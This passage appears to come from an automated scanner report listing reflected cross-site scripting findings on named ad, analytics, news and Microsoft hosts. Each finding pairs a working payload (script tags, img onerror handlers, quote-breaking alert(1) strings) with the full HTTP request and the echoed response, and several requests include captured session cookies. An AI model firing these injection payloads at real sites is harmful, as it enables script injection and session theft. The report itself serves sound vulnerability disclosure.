User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/22/2011 15:42:09&Microsoft.VisitStartDate=07/22/2011 15:42:09&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=32&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 140
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Date: Sat, 23 Jul 2011 04:46:18 GMT
Content-Length: 140

jsonp1311396321262bc091<script>alert(1)</script>21d034f6a3a({"Matches":[],"Term":"84e17<img%20src%3da%20onerror%3dalert(1)>8704c19d382=1"});

3.79. http://services.social.microsoft.com/Search/Data/Terms [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://services.social.microsoft.com
Path:	/Search/Data/Terms

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload deba5<img%20src%3da%20onerror%3dalert(1)>680b3dd871d was submitted in the t parameter. This input was echoed as deba5<img src=a onerror=alert(1)>680b3dd871d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Search/Data/Terms?callback=jsonp1311396321262&t=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1deba5<img%20src%3da%20onerror%3dalert(1)>680b3dd871d&a=1&s=9&m=10&mtl=4 HTTP/1.1
Host: services.social.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/22/2011 15:42:09&Microsoft.VisitStartDate=07/22/2011 15:42:09&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=32&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 143
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Date: Sat, 23 Jul 2011 04:46:29 GMT
Content-Length: 143

jsonp1311396321262({"Matches":[],"Term":"84e17<img%20src%3da%20onerror%3dalert(1)>8704c19d382=1deba5<img src=a onerror=alert(1)>680b3dd871d"});

3.80. http://sgy.sitescout.com/tag.jsp [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sgy.sitescout.com
Path:	/tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5547'%3balert(1)//3001d813790 was submitted in the h parameter. This input was echoed as a5547';alert(1)//3001d813790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tag.jsp?pid=5F090D8&w=300&h=250a5547'%3balert(1)//3001d813790&rnd=8141575 HTTP/1.1
Host: sgy.sitescout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 21 Jul 2011 19:31:16 GMT

var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://sgy.sitescout.com/disp?pid=5F090D8&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250a5547';alert(1)//3001d813790" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.81. http://sgy.sitescout.com/tag.jsp [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sgy.sitescout.com
Path:	/tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 289dd"%3balert(1)//cc9192e141b was submitted in the pid parameter. This input was echoed as 289dd";alert(1)//cc9192e141b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tag.jsp?pid=5F090D8289dd"%3balert(1)//cc9192e141b&w=300&h=250&rnd=8141575 HTTP/1.1
Host: sgy.sitescout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 21 Jul 2011 19:30:51 GMT

var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://sgy.sitescout.com/disp?pid=5F090D8289dd";alert(1)//cc9192e141b&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.82. http://sgy.sitescout.com/tag.jsp [w parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sgy.sitescout.com
Path:	/tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83bb2'%3balert(1)//fd0bb5244ec was submitted in the w parameter. This input was echoed as 83bb2';alert(1)//fd0bb5244ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tag.jsp?pid=5F090D8&w=30083bb2'%3balert(1)//fd0bb5244ec&h=250&rnd=8141575 HTTP/1.1
Host: sgy.sitescout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 21 Jul 2011 19:31:01 GMT

var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://sgy.sitescout.com/disp?pid=5F090D8&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="30083bb2';alert(1)//fd0bb5244ec" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.83. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83bc3'-alert(1)-'7568d65213a was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=83bc3'-alert(1)-'7568d65213a&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

3.84. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af24a'-alert(1)-'716b9fb4375 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.phpaf24a'-alert(1)-'716b9fb4375&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 21 Jul 2011 18:00:59 GMT
Content-Length: 1469
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 20-Jul-2012 18:00:59 GMT; path=/
Set-Cookie: pubfreq_26922_21908_131233610=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:40:59 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Fri, 22-Jul-2011 18:00:59 GMT; path=/

document.write('<div id="http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
fact=0.000000&kadNetFrequecy=2&kadwidth=728&kadheight=90&kltstamp=1311271259&indirectAdId=29795&adServerOptimizerId=1&ranreq=0.5989337249714323&pageURL=http://www.myyearbook.com/advertising/default.phpaf24a'-alert(1)-'716b9fb4375">
...[SNIP]...

3.85. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c0d3'-alert(1)-'177d7fba2be was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.59893372497143236c0d3'-alert(1)-'177d7fba2be&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1469
Date: Thu, 21 Jul 2011 18:01:00 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 20-Jul-2012 18:01:00 GMT; path=/
Set-Cookie: pubfreq_26922_21908_2127498912=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:41:00 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Fri, 22-Jul-2011 18:01:00 GMT; path=/

document.write('<div id="http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
eId=26922&adId=21908&adServerId=165&kefact=0.400000&kpbmtpfact=0.000000&kadNetFrequecy=2&kadwidth=728&kadheight=90&kltstamp=1311271260&indirectAdId=29795&adServerOptimizerId=1&ranreq=0.59893372497143236c0d3'-alert(1)-'177d7fba2be&pageURL=http://www.myyearbook.com/advertising/default.php">
...[SNIP]...

3.86. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sitelife.boston.com
Path:	/ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 5c5f8<script>alert(1)</script>2a6b2a04253 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r={%22Requests%22%3A[{%22ArticleKey%22%3A{%22Key%22%3A%2220110723_1052263300%22}}]%2C%22UniqueId%22%3A0}&cb=bcOverCom5c5f8<script>alert(1)</script>2a6b2a04253&noCacheIE=1311428812606 HTTP/1.1
Host: sitelife.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; mbox=check#true#1311428842|session#1311428781592-195064#1311430642|level#10#1321796782|traffic#true#1321796782|PC#1311428781592-195064.17#1312638385; __unam=b6206f2-130c7ed914a-12883c53-5; RMFD=011QkcXHO1060Og; sslife=1; s_cc=true; s_pv=Lifestyle%20%7C%20Other%20%7C%20Facebook%2C%20Twitter%20obligations%20persist%20during%20vacations; s_sq=%5B%5BB%5D%5D; AxData=; Axxd=1; bcpage=6; s_ppv=27

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 878
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Sat, 23 Jul 2011 13:50:16 GMT

bcOverCom5c5f8<script>alert(1)</script>2a6b2a04253({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"07/23/2011 09:46:19:067 AM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"20110723_1052263300"},"Section":{"Name":"'globe story: liv'"},"
...[SNIP]...

3.87. http://sm6.sitemeter.com/js/counter.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sm6.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e038'%3balert(1)//f4ecbb39fe5 was submitted in the site parameter. This input was echoed as 7e038';alert(1)//f4ecbb39fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/counter.asp?site=sm6damnhippy7e038'%3balert(1)//f4ecbb39fe5 HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:43:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:53:19 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('sm6damnhippy7e038';alert(1)//f4ecbb39fe5', 'sm6.sitemeter.com', '');

var g_sLastCodeName = 'sm6damnhippy7e038';alert(1)//f4ecbb39fe5';
// ]]>
...[SNIP]...

3.88. http://sm6.sitemeter.com/js/counter.js [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sm6.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9549'%3balert(1)//451a5745b3f was submitted in the site parameter. This input was echoed as e9549';alert(1)//451a5745b3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /js/counter.js?site=sm6damnhippye9549'%3balert(1)//451a5745b3f HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:18:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:28:59 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('sm6damnhippye9549';alert(1)//451a5745b3f', 'sm6.sitemeter.com', '');

var g_sLastCodeName = 'sm6damnhippye9549';alert(1)//451a5745b3f';
// ]]>
...[SNIP]...

3.89. http://social.msdn.microsoft.com/Search/en-US [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://social.msdn.microsoft.com
Path:	/Search/en-US

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ebb6e%20a%3db2dac2458762 was submitted in the REST URL parameter 2. This input was echoed as ebb6e a=b2dac2458762 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Search/en-USebb6e%20a%3db2dac2458762?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8 HTTP/1.1
Host: social.msdn.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/22/2011 15:42:09&Microsoft.VisitStartDate=07/22/2011 15:42:09&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=32&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_NVR=0=/:1=en-us:2=en-us/vstudio

Response (redirected)

3.90. http://sr2.liveperson.net/visitor/addons/deploy2.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/visitor/addons/deploy2.asp

Issue detail

